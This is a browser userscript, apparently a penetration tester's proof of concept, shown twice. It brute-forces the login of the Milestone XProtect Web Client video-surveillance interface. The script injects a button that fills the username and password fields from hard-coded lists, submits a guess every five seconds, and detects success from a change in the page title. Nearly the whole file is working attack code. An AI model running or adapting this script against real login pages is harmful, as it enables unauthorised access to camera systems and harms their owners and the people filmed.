DiabloHorn/ xprotect-brute-js.user.js

## xprotect-brute-js.user.js
// ==UserScript==
// @name        xprotect-brute-js
// @namespace   ns-xprotect-brute-js
// @description Brute force Milestone XProtect Web Client
// @include     http://localhost:8081/index.html
// @version     1
// @grant       none
// ==/UserScript==
//DiabloHorn - https://diablohorn.com
var foundcreds = 0;
var i = 0;
var y = 0;
var currUsr = "";
var currPwd = "";

//https://stackoverflow.com/a/2497223
var oldTitle = document.title;
window.setInterval(function()
{
    if (document.title !== oldTitle)
    {
        console.log("[!!!!!!!!] YAY! "+currUsr+" "+currPwd);
        if (currUsr != ""){
          foundcreds = 1;
        }
    }
    oldTitle = document.title;
}, 100); //check every 100ms

//main script based off: https://stackoverflow.com/q/36915136
var input=document.createElement("button");
input.type="button";
input.value="BruteXprotect";
input.innerHTML="BruteXprotect";
input.onclick= bruteXprotect;
input.setAttribute("style", "font-size:18px;position:absolute;top:120px;right:40px;");
document.body.appendChild(input);

function bruteXprotect(){
  setInterval(loginAttempt,5000);
}

function loginAttempt(){
  if (foundcreds == 1){
    return;
  }
  var runme = 1;
  var usrList = ["research1","research2","research","morebad","supahbad"];
  var pwdList = ["omg","omg2","test","notworking","zzz","xxxx","yyyyyy"];
  while (i < usrList.length){
    while (y < pwdList.length){
      currUsr = usrList[i];
      currPwd = pwdList[y];
      console.log("[****] Current::"+currUsr+"::"+currPwd);
      var myusr = document.getElementById('loginWindow_usernameInput');
      var mypwd = document.getElementById('loginWindow_passwordInput');
      myusr.value=currUsr;
      mypwd.value=currPwd;
      if (runme == 1){
        //https://stackoverflow.com/a/6337307
        var evt = document.createEvent ("HTMLEvents");
        evt.initEvent ("click", true, true);
        document.getElementById('loginWindow_submit').dispatchEvent(evt);
        runme = 0;
        y++;
      }
      break;
    }
    if (y == (pwdList.length-1)){
      y = 0;
      i++;
    }
    break;
  }
}
	// ==UserScript==
	// @name xprotect-brute-js
	// @namespace ns-xprotect-brute-js
	// @description Brute force Milestone XProtect Web Client
	// @include http://localhost:8081/index.html
	// @version 1
	// @grant none
	// ==/UserScript==
	//DiabloHorn - https://diablohorn.com
	var foundcreds = 0;
	var i = 0;
	var y = 0;
	var currUsr = "";
	var currPwd = "";

	//https://stackoverflow.com/a/2497223
	var oldTitle = document.title;
	window.setInterval(function()
	{
	if (document.title !== oldTitle)
	{
	console.log("[!!!!!!!!] YAY! "+currUsr+" "+currPwd);
	if (currUsr != ""){
	foundcreds = 1;
	}
	}
	oldTitle = document.title;
	}, 100); //check every 100ms

	//main script based off: https://stackoverflow.com/q/36915136
	var input=document.createElement("button");
	input.type="button";
	input.value="BruteXprotect";
	input.innerHTML="BruteXprotect";
	input.onclick= bruteXprotect;
	input.setAttribute("style", "font-size:18px;position:absolute;top:120px;right:40px;");
	document.body.appendChild(input);

	function bruteXprotect(){
	setInterval(loginAttempt,5000);
	}

	function loginAttempt(){
	if (foundcreds == 1){
	return;
	}
	var runme = 1;
	var usrList = ["research1","research2","research","morebad","supahbad"];
	var pwdList = ["omg","omg2","test","notworking","zzz","xxxx","yyyyyy"];
	while (i < usrList.length){
	while (y < pwdList.length){
	currUsr = usrList[i];
	currPwd = pwdList[y];
	console.log("[****] Current::"+currUsr+"::"+currPwd);
	var myusr = document.getElementById('loginWindow_usernameInput');
	var mypwd = document.getElementById('loginWindow_passwordInput');
	myusr.value=currUsr;
	mypwd.value=currPwd;
	if (runme == 1){
	//https://stackoverflow.com/a/6337307
	var evt = document.createEvent ("HTMLEvents");
	evt.initEvent ("click", true, true);
	document.getElementById('loginWindow_submit').dispatchEvent(evt);
	runme = 0;
	y++;
	}
	break;
	}
	if (y == (pwdList.length-1)){
	y = 0;
	i++;
	}
	break;
	}
	}